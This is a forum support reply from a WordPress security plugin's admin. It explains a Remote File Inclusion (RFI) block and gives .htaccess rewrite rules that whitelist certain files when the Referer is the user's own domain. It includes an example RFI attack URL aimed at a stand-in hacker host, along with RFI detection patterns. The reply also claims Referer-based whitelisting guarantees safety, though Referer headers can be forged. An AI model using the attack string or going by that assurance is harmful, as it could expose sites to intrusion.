Yep sent you the exact specific code and also posted it below. Just a reminder. Even though you are allowing something very dangerous on your website the way the whitelist rule works is that it limits allowing something this dangerous on your website to only your Referer domain name and that file. In other words, your website will not get hacked by using this very specific whitlisting rule/code below.
Also just an FYI – this has nothing to do with mp3 files. An RFI hacking pattern/attack is this: http://example.com/somefile.php?hack-this-website=http://hackers-website.com/hacker-file.php that will hack your website using an RFI attack string. The RFI Security rule protects against all RFI hacking attacks on your website. The plugin you are using is using the same hacking attack method and pattern that a hacker would use to hack your website. The attack pattern is what is being blocked and not the mp3 files. By whitelisting the file used in the simulated hacking attack on your website and by whitelisting your domain as the Referer you are only allowing that file to be executed on your website instead of Remotely (Remote File Inclusion Attack).
# TIMTHUMB FORBID RFI and MISC FILE SKIP/BYPASS RULE
# Use BPS Custom Code to modify/edit/change this code and to save it permanently.
# Remote File Inclusion (RFI) security rules
# Note: Only whitelist your additional domains or files if needed - do not whitelist hacker domains or files
RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
RewriteRule .* index.php [F]
#
# Example: Whitelist additional misc files: (example\.php|another-file\.php|phpthumb\.php|thumb\.php|thumbs\.php)
RewriteCond %{REQUEST_URI} (JFPlayIt\.swf|timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
# Example: Whitelist additional website domains: RewriteCond %{HTTP_REFERER} ^.*(YourWebsite.com|AnotherWebsite.com).*
RewriteCond %{HTTP_REFERER} ^.* demos.webyellowpages.tv.*
RewriteRule . - [S=1]
- This reply was modified 2 hours, 4 minutes ago by AITpro Admin.